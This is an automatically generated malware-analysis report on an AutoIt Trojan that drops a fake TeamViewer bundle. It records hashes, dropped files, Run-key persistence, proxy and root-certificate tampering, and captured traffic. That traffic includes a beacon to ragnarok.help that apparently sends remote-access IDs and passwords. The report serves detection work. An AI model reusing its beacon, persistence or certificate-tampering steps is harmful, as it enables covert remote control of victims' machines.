Gen.Variant.Strictor.115561_d5667115fd
Gen:Variant.Strictor.115561 (BitDefender), HEUR:Trojan.Script.Generic (Kaspersky), Gen:Variant.Strictor.115561 (B) (Emsisoft), Gen:Variant.Strictor.115561 (FSecure), Gen:Variant.Strictor.115561 (AdAware), Worm.Win32.AutoIt.FD, WormAutoItGen.YR (Lavasoft MAS)
Behaviour: Trojan, Worm
The description has been automatically generated by Lavasoft Malware Analysis System and it may contain incomplete or inaccurate information.
| Requires JavaScript enabled! |
|---|
MD5: d5667115fd8b374910def324503417b3
SHA1: cfe9ddb5cd95dd8ed59f798038b737e4f84eca5a
SHA256: 0acfa3bd1a2abe7e0c14b26653b315d4796de16a65d6ba92b00951c480a742eb
SSDeep: 196608:yjT8WTMg0CeSverjwZgS4CKS7EHLsES7dLGOObATKqc4tAf1:y8sMg0CXWXyV4CKSSS7l7OkO14tE
Size: 12752946 bytes
File type: EXE
Platform: WIN32
Entropy: Packed
PEID: UPolyXv05_v6
Company: no certificate found
Created at: 2017-03-23 01:29:36
Analyzed on: Windows7 SP1 32-bit
Summary:
Trojan. A program that appears to do one thing but actually does another (a.k.a. Trojan Horse).
Payload
No specific payload has been found.
Process activity
The Trojan creates the following process(es):
tv_w32.exe:3792
%original file name%.exe:2748
rundll32.exe:2360
The Trojan injects its code into the following process(es):
Teamviewer.exe:3496
Mutexes
The following mutexes were created/opened:
No objects were found.
File activity
The process Teamviewer.exe:3496 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
C:\System Volume Information\Syscache.hve.LOG1 (4888 bytes)
C:\Boot\BCD (1792 bytes)
C:\Windows\System32\config\SOFTWARE (33631 bytes)
C:\Windows\ServiceProfiles\LocalService\NTUSER.DAT (1592 bytes)
C:\Windows\ServiceProfiles\NetworkService\NTUSER.DAT.LOG1 (1384 bytes)
C:\Users\"%CurrentUserName%"\ntuser.dat.LOG1 (17872 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\UsrClass.dat.LOG1 (5912 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\Teamview\Teamviewer_StaticRes.dll (291 bytes)
C:\Windows\System32\config\SECURITY (1120 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\Teamview\Teamviewer_Resource_en.dll (323 bytes)
C:\Boot\BCD.LOG (1384 bytes)
C:\$Directory (1264 bytes)
C:\Windows\System32\config\SOFTWARE.LOG1 (28783 bytes)
C:\Windows\ServiceProfiles\NetworkService\NTUSER.DAT (2256 bytes)
C:\Windows\System32\config\DEFAULT (5864 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\UsrClass.dat (6936 bytes)
C:\System Volume Information\Syscache.hve (5368 bytes)
C:\Windows\System32\config\DEFAULT.LOG1 (6568 bytes)
C:\Windows\System32\config\SYSTEM.LOG1 (372442 bytes)
C:\Users\"%CurrentUserName%"\NTUSER.DAT (20448 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\TeamViewer\TeamViewer10_Logfile.log (54636 bytes)
C:\Windows\ServiceProfiles\LocalService\NTUSER.DAT.LOG1 (1168 bytes)
C:\Windows\System32\config\SYSTEM (379624 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\Teamview\tv_w32.dll (249 bytes)
C:\Windows\System32\config\SECURITY.LOG1 (1048 bytes)
The process tv_w32.exe:3792 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
C:\Users\"%CurrentUserName%"\AppData\Roaming\TeamViewer\TeamViewer10_Logfile.log (1978 bytes)
The process %original file name%.exe:2748 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\aut3217.tmp (49148 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\Teamview\Teamviewer_StaticRes.dll (32474 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\aut37B9.tmp (1665 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\Teamview\tv_x64.exe (2569 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\aut35E0.tmp (1153 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\aut37E9.tmp (1377 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\aut3610.tmp (17212 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\Teamview\Teamviewer_Service.exe (33916 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\aut3759.tmp (1377 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\aut377A.tmp (2017 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\Teamview\tv_x64.dll (2905 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\JYNOWECL\index[1].htm (2 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\Teamview\tv_w32.dll (3185 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\aut36FB.tmp (3873 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\Teamview\tv_w32.exe (2801 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\Teamview\Teamviewer_Desktop.exe (41477 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\25FDO7QC\index[1].htm (2 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\aut34E5.tmp (18500 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\Teamview\Teamview.exe (96045 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\Teamview\Teamviewer.exe (108383 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\Teamview\Teamviewer_Resource_en.dll (3057 bytes)
The Trojan deletes the following file(s):
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\aut3217.tmp (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\aut37B9.tmp (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\aut35E0.tmp (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\aut377A.tmp (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\aut37E9.tmp (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\aut36FB.tmp (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\aut34E5.tmp (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\aut3610.tmp (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\aut3759.tmp (0 bytes)
The process rundll32.exe:2360 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Low\Content.IE5\L7SVFO1F\desktop.ini (67 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Low\desktop.ini (67 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Low\Content.IE5\061RBBHH\desktop.ini (67 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Low\Content.IE5\71DZTAY2\desktop.ini (67 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Low\Content.IE5\index.dat (16 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Low\Content.IE5\desktop.ini (67 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Low\Content.IE5\YQFVAVW6\desktop.ini (67 bytes)
Registry activity
The process Teamviewer.exe:3496 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"AutoDetect" = "1"
[HKCU\Software\Microsoft\Direct3D\MostRecentApplication]
"Name" = "Teamviewer.exe"
[HKLM\SOFTWARE\TeamViewer\DefaultSettings]
"Autostart_GUI" = "0"
[HKLM\SOFTWARE\TeamViewer]
"SRPPasswordMachineIdentifier" = "93 59 B6 09 D6 E0 89 40 1B B2 07 71 D6 70 A2 E0"
[HKCU\Software\Classes\Local Settings\MuiCache\2D\52C64B7E]
"LanguageList" = "en-US, en"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "0"
[HKLM\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D69B561148F01C77C54578C10926DF5B856976AD]
"Blob" = "0F 00 00 00 01 00 00 00 20 00 00 00 52 29 BA 15"
The Trojan deletes the following registry key(s):
[HKLM\SOFTWARE\TeamViewer\Temp]
The Trojan deletes the following value(s) in system registry:
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"ProxyBypass"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"ProxyBypass"
"IntranetName"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName"
[HKLM\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates]
"D69B561148F01C77C54578C10926DF5B856976AD"
The process %original file name%.exe:2748 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"AutoDetect" = "1"
[HKLM\SOFTWARE\Microsoft\Tracing\d5667115fd8b374910def324503417b3_RASMANCS]
"MaxFileSize" = "1048576"
[HKLM\SOFTWARE\Microsoft\Tracing\d5667115fd8b374910def324503417b3_RASAPI32]
"MaxFileSize" = "1048576"
[HKLM\SOFTWARE\Microsoft\Tracing\d5667115fd8b374910def324503417b3_RASMANCS]
"ConsoleTracingMask" = "4294901760"
[HKLM\SOFTWARE\Microsoft\Tracing\d5667115fd8b374910def324503417b3_RASAPI32]
"FileDirectory" = "%windir%\tracing"
[HKLM\SOFTWARE\Microsoft\Tracing\d5667115fd8b374910def324503417b3_RASMANCS]
"FileDirectory" = "%windir%\tracing"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "0"
[HKLM\SOFTWARE\Microsoft\Tracing\d5667115fd8b374910def324503417b3_RASMANCS]
"EnableConsoleTracing" = "0"
[HKLM\SOFTWARE\Microsoft\Tracing\d5667115fd8b374910def324503417b3_RASAPI32]
"ConsoleTracingMask" = "4294901760"
"EnableFileTracing" = "0"
"EnableConsoleTracing" = "0"
"FileTracingMask" = "4294901760"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"GlobalUserOffline" = "0"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "46 00 00 00 3C 00 00 00 09 00 00 00 00 00 00 00"
[HKLM\SOFTWARE\Microsoft\Tracing\d5667115fd8b374910def324503417b3_RASMANCS]
"FileTracingMask" = "4294901760"
"EnableFileTracing" = "0"
To automatically run itself each time Windows is booted, the Trojan adds the following link to its file to the system registry autorun key:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Run]
"Teamview" = "C:\Users\"%CurrentUserName%"\AppData\Local\Temp\Teamview\Teamview.exe"
Proxy settings are disabled:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"
The Trojan deletes the following value(s) in system registry:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"ProxyBypass"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyServer"
"ProxyOverride"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName"
"ProxyBypass"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"AutoConfigURL"
Dropped PE files
| MD5 | File path |
|---|---|
| 0a19fc76181bffe86add75739f29d05e | c:\Users\"%CurrentUserName%"\AppData\Local\Temp\Teamview\Teamviewer.exe |
| a5d231aa03d07428bb73bccbf0cd5ba5 | c:\Users\"%CurrentUserName%"\AppData\Local\Temp\Teamview\Teamviewer_Desktop.exe |
| 5e380a665e663242dbecfdfeb2c313c2 | c:\Users\"%CurrentUserName%"\AppData\Local\Temp\Teamview\Teamviewer_Resource_en.dll |
| fa1520d147762335b5db0b26c243a84a | c:\Users\"%CurrentUserName%"\AppData\Local\Temp\Teamview\Teamviewer_Service.exe |
| 2fb0cf0cb5e25197d317afcc5c65db58 | c:\Users\"%CurrentUserName%"\AppData\Local\Temp\Teamview\Teamviewer_StaticRes.dll |
| 6117139656c0b01db5c0364f64644b06 | c:\Users\"%CurrentUserName%"\AppData\Local\Temp\Teamview\tv_w32.dll |
| fbc76fb8ac96c179e4d0bc806b850748 | c:\Users\"%CurrentUserName%"\AppData\Local\Temp\Teamview\tv_w32.exe |
| 491fcf06d539e45eb27c5299ed490dcf | c:\Users\"%CurrentUserName%"\AppData\Local\Temp\Teamview\tv_x64.dll |
| 24b9ba271bc87c8b9fc05a688923652f | c:\Users\"%CurrentUserName%"\AppData\Local\Temp\Teamview\tv_x64.exe |
HOSTS file anomalies
No changes have been detected.
Rootkit activity
No anomalies have been detected.
Propagation
VersionInfo
Company Name:
Product Name:
Product Version:
Legal Copyright:
Legal Trademarks:
Original Filename:
Internal Name:
File Version:
File Description:
Comments:
Language: English (United States)
PE Sections
| Name | Virtual Address | Virtual Size | Raw Size | Entropy | Section MD5 |
|---|---|---|---|---|---|
| .text | 4096 | 580910 | 581120 | 4.62736 | c2c2260508750422d20cd5cbb116b146 |
| .rdata | 585728 | 188686 | 188928 | 3.99304 | 4513b58651e3d8d87c81a396e5b2f1d1 |
| .data | 778240 | 36724 | 20992 | 0.830952 | c2de4a3d214eae7e87c7bfc06bd79775 |
| .rsrc | 815104 | 11931588 | 11931648 | 5.54454 | 832b4e4d10d05615407d49e85cf29b71 |
| .reloc | 12746752 | 28976 | 29184 | 4.70119 | 1254908a9a03d2bcf12045d49cd572b9 |
Dropped from:
Downloaded by:
Similar by SSDeep:
Similar by Lavasoft Polymorphic Checker:
URLs
| URL | IP |
|---|---|
| hxxp://ragnarok.help/TW/index.php?u=-&p=- | |
| hxxp://a767.dspw65.akamai.net/msdownload/update/v3/static/trustedr/en/authrootstl.cab | |
| hxxp://ragnarok.help/TW/index.php?u=1119873363&p=8709 | |
| hxxp://e8218.dscb1.akamaiedge.net/MFEwTzBNMEswSTAJBgUrDgMCGgUABBR6EHhJ4XUaQA4N26wwyKpLEnXRrAQULNVQQZcVi/CPNmFbSvtr2ZnJM5ICEG6KkOvP8ESKcg0IBdCCpUQ= | |
| hxxp://a1363.dscg.akamai.net/pki/crl/products/MicCodSigPCA_08-31-2010.crl | |
| hxxp://a1158.b.akamai.net/MFUwUzBRME8wTTAJBgUrDgMCGgUABBTkLVLomfJQOu5CFIgPOR73ljBRHAQU+L36r3N3xscb+UtNEafRM6+vchECFEOZrYpYgDwxeWGj/HetMtWiXvU/ | |
| hxxp://clients.l.google.com/ocsp/MEkwRzBFMEMwQTAJBgUrDgMCGgUABBTy4Gr5hYodjXCbSRkjeqm1Gih+ZAQUSt0GFhu89mi1dvWBtrtiGrpagS8CCGZimYWX7CS+ | |
| hxxp://clients1.google.com/ocsp/MEkwRzBFMEMwQTAJBgUrDgMCGgUABBTy4Gr5hYodjXCbSRkjeqm1Gih+ZAQUSt0GFhu89mi1dvWBtrtiGrpagS8CCGZimYWX7CS+ | |
| hxxp://vassg142.ocsp.omniroot.com/MFUwUzBRME8wTTAJBgUrDgMCGgUABBTkLVLomfJQOu5CFIgPOR73ljBRHAQU+L36r3N3xscb+UtNEafRM6+vchECFEOZrYpYgDwxeWGj/HetMtWiXvU/ | |
| hxxp://g2.symcb.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBR6EHhJ4XUaQA4N26wwyKpLEnXRrAQULNVQQZcVi/CPNmFbSvtr2ZnJM5ICEG6KkOvP8ESKcg0IBdCCpUQ= | |
| hxxp://crl.microsoft.com/pki/crl/products/MicCodSigPCA_08-31-2010.crl | |
| hxxp://www.download.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cab | |
| ping3.teamviewer.com | |
| client.teamviewer.com |
IDS verdicts (Suricata alerts: Emerging Threats ET ruleset)
ET POLICY Autoit Windows Automation tool User-Agent in HTTP Request - Possibly Hostile
Traffic
GET /pki/crl/products/MicCodSigPCA_08-31-2010.crl HTTP/1.1
Cache-Control: max-age = 900
Connection: Keep-Alive
Accept: */*
If-Modified-Since: Tue, 29 Oct 2013 05:02:50 GMT
If-None-Match: "b8b5df1d64d4ce1:0"
User-Agent: Microsoft-CryptoAPI/6.1
Host: crl.microsoft.com
HTTP/1.1 200 OK
Content-Length: 554
Content-Type: application/pkix-crl
Last-Modified: Thu, 15 Jun 2017 00:43:48 GMT
ETag: 0x8D4B38795FC4CDC
Server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
x-ms-request-id: 9576bca8-0001-0047-2479-e5981b000000
x-ms-version: 2009-09-19
x-ms-lease-status: unlocked
x-ms-blob-type: BlockBlob
Date: Mon, 26 Jun 2017 22:39:58 GMT
Connection: keep-alive0..&0......0...*.H........0y1.0...U....US1.0...U....Washington1.0...U.
...Redmond1.0...U....Microsoft Corporation1#0!..U....Microsoft Code Si
gning PCA..170512163339Z..170811045339Z.a0_0...U.#..0..........X..7.3.
..L...0... .....7.........0...U......d0... .....7......170810164339Z0.
..*.H................."*....N...........D...........A..v.@?.H5...O{D".
-.B.......gO.{..O}.._.....M....A.mI.u.;sPS.....?jj.=.~]z.A.fJ...M*|..!
<......>....|.&...j.Z.T[/s...K0<.;...".2.)..X9.....$..O...Ot:
V.:..9.W...|...C.A.....,dy..].bg.&I.../U..B........rr.....*......P.t.^
..FHTTP/1.1 200 OK..Content-Length: 554..Content-Type: application/pki
x-crl..Last-Modified: Thu, 15 Jun 2017 00:43:48 GMT..ETag: 0x8D4B38795
FC4CDC..Server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0..x-ms-req
uest-id: 9576bca8-0001-0047-2479-e5981b000000..x-ms-version: 2009-09-1
9..x-ms-lease-status: unlocked..x-ms-blob-type: BlockBlob..Date: Mon,
26 Jun 2017 22:39:58 GMT..Connection: keep-alive..0..&0......0...*.H..
......0y1.0...U....US1.0...U....Washington1.0...U....Redmond1.0...U...
.Microsoft Corporation1#0!..U....Microsoft Code Signing PCA..170512163
339Z..170811045339Z.a0_0...U.#..0..........X..7.3...L...0... .....7...
......0...U......d0... .....7......170810164339Z0...*.H...............
.."*....N...........D...........A..v.@?.H5...O{D".-.B.......gO.{..O}..
_.....M....A.mI.u.;sPS.....?jj.=.~]z.A.fJ...M*|..!<......>....|.
&...j.Z.T[/s...K0<.;...".2.)..X9.....$..O...Ot:V.:..9.W...|...C.A..
...,dy..].bg.&I.../U..B........rr.....*......P.t.^..F..<<< skipped >>>
GET /msdownload/update/v3/static/trustedr/en/authrootstl.cab HTTP/1.1
Cache-Control: max-age = 86402
Connection: Keep-Alive
Accept: */*
If-Modified-Since: Fri, 16 Sep 2016 21:16:59 GMT
If-None-Match: "8017f9a85f10d21:0"
User-Agent: Microsoft-CryptoAPI/6.1
Host: VVV.download.windowsupdate.com
HTTP/1.1 200 OK
Cache-Control: max-age=604800
Content-Type: application/vnd.ms-cab-compressed
Last-Modified: Wed, 19 Apr 2017 22:43:31 GMT
Accept-Ranges: bytes
ETag: "80ab755e5eb9d21:0"
Server: Microsoft-IIS/8.5
X-Powered-By: ASP.NET
Content-Length: 52608
Date: Mon, 26 Jun 2017 22:39:17 GMT
Connection: keep-alive
X-CCC: UA
X-CID: 2MSCF............,...................I.......f..........Je} .authroot.s
tl..Q...6..CK...8...........].y.Q..!Jv..%k.....!..DH.....^..*.E)7k..Rq
...Lu..........[.y..s...~.4.~....4.0a..f.;.~7'M...a<.... .IO'....Z.
.E..F.XuV.....L..@..Y.L......GW.{fd<.8...*~...*...@.e...Xx).{....3T
.C....'..v..A.X......l....3.=..w....P...s#..;...C.(./.. .C.tC...gnI..j
W89.JQ...y..gq.3.Z&.Gz...NV.t...(J.../..%9..W..>.h;$.@..f..La.k....
..s ......`..G..C......@.....@b.....G...x...l".s.c.0......X...C.H.....
.....T.....}.R.`..../...1Z......X..oX...;....f.......LG[....~;.}mw.'.
..v......`.7ZR..-.........8.....>.:(..........keX.. r......B...Z.ax
C....... 0.#....\.8.....$t:$(.Q....kQ........s.}3b.e.xb....7...r:.<
..>m..:.V.u....kn.3.Y.ar.,.y..b.....{.OO?c/;m.v..k.o.Kj...0G.m.....
j*.U....... ..~.....Z.dS.J..S.y.c...y.......{..Co...i.U....7.i]......W
...T...Y..X..........e.b.`*Uk.T..a....*...M^m..Jvk..g........<d:l..
Sq.H...*y...x1.e....<..V.q..u."v.};G.Px.......{....Y.........5..`..
..x..b_.....W.Mn...5d.,.0|.9".g..L..R.....g..............." z(.F.$.@.
@......}r..O8P.W.Tr./}\.....X..f=..d`,.X..'.r.8....q.Or:..<v.zFW.Y.
.....nk.:..G.K...GxQ._2!.....t?..(.q...e.&F.............2JG.....b...~.
./....M.6.~.b<...).(.Iy..P..$n. ....._..#.aBz....)..[.2............
..........Ew..9-.2;...2.g.5.-..G.o....K.J..,...(...bd.$..0..r..Z....*.
....._.B.)b<.w}t....]..t....=....b.?...u..A..Z.....6........n12j.0"
.U..,..fd_$A."....... .G.c.u...k.....l....$.@.`A.>,....L}.O......X.
.....rL.GM..p..H;....O@..Q2..T........]..e.G...9.W..06~..R..@V|...<<< skipped >>>
GET /TW/index.php?u=1119873363&p=8709 HTTP/1.1
User-Agent: AutoIt
Host: ragnarok.help
HTTP/1.1 200 OK
Date: Mon, 26 Jun 2017 22:39:22 GMT
Server: Apache/2.4.7 (Ubuntu)
X-Powered-By: PHP/5.5.9-1ubuntu4.14
Content-Length: 2
Content-Type: text/htmlokHTTP/1.1 200 OK..Date: Mon, 26 Jun 2017 22:39:22 GMT..Server: Apache
/2.4.7 (Ubuntu)..X-Powered-By: PHP/5.5.9-1ubuntu4.14..Content-Length:
2..Content-Type: text/html..ok..
GET /MFUwUzBRME8wTTAJBgUrDgMCGgUABBTkLVLomfJQOu5CFIgPOR73ljBRHAQU+L36r3N3xscb+UtNEafRM6+vchECFEOZrYpYgDwxeWGj/HetMtWiXvU/ HTTP/1.1
Cache-Control: max-age = 339923
Connection: Keep-Alive
Accept: */*
If-Modified-Since: Thu, 13 Oct 2016 09:41:21 GMT
If-None-Match: "c06e9a4e33eec9dd813b8faff15397229f914d2a"
User-Agent: Microsoft-CryptoAPI/6.1
Host: vassg142.ocsp.omniroot.com
HTTP/1.1 200 OK
Server: nginx
Content-Type: application/ocsp-response
Content-Length: 1746
Last-Modified: Mon, 26 Jun 2017 19:59:48 GMT
ETag: "a198c9c5c9e130dc6bb757cb1db24d3e76dabceb"
Cache-Control: public, no-transform, must-revalidate, max-age=330664
Expires: Fri, 30 Jun 2017 18:31:08 GMT
Date: Mon, 26 Jun 2017 22:40:04 GMT
Connection: keep-alive0..........0..... .....0......0...0.......d._t.a...(..fx..r....2017062
6195948Z0w0u0M0... .........-R...P:.B...9...0Q.......sw....KM...3..r..
.C...X.<1ya..w.2..^.?....20170626195948Z....20170630195948Z0...*.H.
.............!>.;.....Y.6..M}.G._m*#...s...-j.....TFNH..2...4......
.....6eL....gB....6uJ\.4RKk..j...:.......a.}.....L) ..B.F...r.}.u.eO..
..C.o...b..s..Q..y....~..D..f. xAv.]._%.a..sQ.0...;Z$L^.~P=...M..aDN..
5,..?}..y;}.. ...'..?I...$..L..w.._..S.z! t8*..d...../Y..........0...0
...0..........&.L..J..T...vP..yV..0...*.H........0..1.0...U....NL1.0..
.U....Amsterdam1%0#..U....Verizon Enterprise Solutions1.0...U....Cyber
trust1.0,..U...%Verizon Akamai SureServer CA G14-SHA20...170310213626Z
..180309213625Z0..1.0...U....NL1.0...U....Amsterdam1%0#..U....Verizon
Enterprise Solutions1.0...U....Cybertrust1%0#..U....vassg142 OCSP Resp
onder 20170.."0...*.H.............0..........\..K.......:..K&!...!`D#'
2~mL...<..E`.:Y.I..w.....P..)..o..><^-7.h.zL......3.."....T..
.-s.g........zUY5q....u...D........(....C.XmF=.r...8h....I.....[...P.
...;..c...0.'x..F..h...&<Q.vO.b2.pm.y..J.P"...H....A....T......._.d
c.F-..W....Z...).=.Y..n2...N..E........H0..D0... .....0......0L..U. .E
0C0A.. .....>..0402.. ........&hXXps://secure.omniroot.com/reposito
ry0~.. ........r0p06.. .....0..*hXXps://cacert.a.omniroot.com/vassg142
.crt06.. .....0..*hXXps://cacert.a.omniroot.com/vassg142.der0...U.....
......0...U.%..0... .......0...U.#..0.......sw....KM...3..r.0...U.....
..d._t.a...(..fx..r..0...*.H..................6..dez....$...^I...g<<< skipped >>>
GET /ocsp/MEkwRzBFMEMwQTAJBgUrDgMCGgUABBTy4Gr5hYodjXCbSRkjeqm1Gih+ZAQUSt0GFhu89mi1dvWBtrtiGrpagS8CCGZimYWX7CS+ HTTP/1.1
Cache-Control: max-age = 345600
Connection: Keep-Alive
Accept: */*
User-Agent: Microsoft-CryptoAPI/6.1
Host: clients1.google.com
HTTP/1.1 200 OK
Content-Type: application/ocsp-response
Date: Sun, 25 Jun 2017 17:02:31 GMT
Expires: Thu, 29 Jun 2017 17:02:31 GMT
Server: ocsp_responder
Content-Length: 463
X-XSS-Protection: 1; mode=block
X-Frame-Options: SAMEORIGIN
Cache-Control: public, max-age=345600
Age: 1066580..........0..... .....0......0...0......J......h.v....b..Z./..2017062
5130751Z0k0i0A0... ..........j.....p.I.#z...(~d..J......h.v....b..Z./.
.fb....$.....20170625130751Z....20170702130751Z0...*.H.............L..
P..8I..}.8......;.Z...IoZY...orT......m.....@..E..[b.&..<ybtee..TL.
...h......0...9...".m.jzTq.mQ.X\........O[.D)u.....U.?."z.E.c..|.E.X..
K...;...ch..6..k..6.......J..zL....CXu..e6<.Yg....,..SrX.x..L....3Z
.1.^.b.hu@..{..K.0.....^.z*jf.._...IR..e.....%:VmHTTP/1.1 200 OK..Cont
ent-Type: application/ocsp-response..Date: Sun, 25 Jun 2017 17:02:31 G
MT..Expires: Thu, 29 Jun 2017 17:02:31 GMT..Server: ocsp_responder..Co
ntent-Length: 463..X-XSS-Protection: 1; mode=block..X-Frame-Options: S
AMEORIGIN..Cache-Control: public, max-age=345600..Age: 106658..0......
....0..... .....0......0...0......J......h.v....b..Z./..20170625130751
Z0k0i0A0... ..........j.....p.I.#z...(~d..J......h.v....b..Z./..fb....
$.....20170625130751Z....20170702130751Z0...*.H.............L..P..8I..
}.8......;.Z...IoZY...orT......m.....@..E..[b.&..<ybtee..TL....h...
...0...9...".m.jzTq.mQ.X\........O[.D)u.....U.?."z.E.c..|.E.X..K...;..
.ch..6..k..6.......J..zL....CXu..e6<.Yg....,..SrX.x..L....3Z.1.^.b.
hu@..{..K.0.....^.z*jf.._...IR..e.....%:Vm..
GET /MFEwTzBNMEswSTAJBgUrDgMCGgUABBR6EHhJ4XUaQA4N26wwyKpLEnXRrAQULNVQQZcVi/CPNmFbSvtr2ZnJM5ICEG6KkOvP8ESKcg0IBdCCpUQ= HTTP/1.1
Connection: Keep-Alive
Accept: */*
User-Agent: Microsoft-CryptoAPI/6.1
Host: g2.symcb.com
HTTP/1.1 200 OK
Server: nginx/1.10.2
Content-Type: application/ocsp-response
Content-Length: 1427
content-transfer-encoding: binary
Cache-Control: max-age=388872, public, no-transform, must-revalidate
Last-Modified: Sat, 24 Jun 2017 10:37:29 GMT
Expires: Sat, 1 Jul 2017 10:37:29 GMT
Date: Mon, 26 Jun 2017 22:39:23 GMT
Connection: keep-alive0..........0..... .....0.....u0..q0.........-b.Ce.....>...Q....2017
0624103729Z0s0q0I0... ........z.xI.u.@....0..K.u....,.PA.....6a[J.k...
3...n.....D.r......D....20170624103729Z....20170701103729Z0...*.H.....
........(...............Q".c..\..C..N0..Y/...*.J....W....2.E.$.'.*&.'
t .>.,Oa.....w7._.....i.{.....K..n.xP..NH.;..........._1s.Gp.......
...(......b.,I<DV>.cL.......>Ip%.%..b9.@...5...{..kB3..4q..*.
Eph....j.>..r.,....GO..}!%H...H~MB..8....._..4............k*..GE.&g
t;....0...0...0..........pP.3....I....m..0...*.H........0X1.0...U....U
S1.0...U....GeoTrust Inc.110/..U...(GeoTrust Primary Certification Aut
hority0...161122000000Z..171214235959Z0d1.0...U....US1.0...U....GeoTru
st Inc.1=0;..U...4GeoTrust Primary CA OCSP-TGV Responder Certificate 5
0.."0...*.H.............0.........9....o%uu!p26[......~..$.I...p....#.
k..?.I_.-"...~ROB.MFG......B...^.^ ...D......".d.U.......{#..K'..&..u.
&...q..Y.(..%s..R..o..M../.exn.....V...?..>$........~<X.i\...,..
......6i.......l.E..e...\....tW..;.`.o.. ...I..}......`...........x..3
.,..S..fY.....o......j0h0...U.%..0... .......0... .....0......0...U...
....0.0...U...........0"..U....0...0.1.0...U....TGV-OFF-520...*.H.....
.........>H........1.N......#...E.......:..- ......o..l._aa...K`7.&
lt;YXi..'......y...O..{.....z.......L..ee...........W.a.;.2.de.....A..
...S..LAzB.H...I...*.7...t..CQ.._ ....Y.F^a4..n.*...w...y..d04.DpQ....
.....E..k.2.I.[.....D.G....[D.{c.....Rw.. ..... W.........-...<<< skipped >>>
GET /TW/index.php?u=-&p=- HTTP/1.1
User-Agent: AutoIt
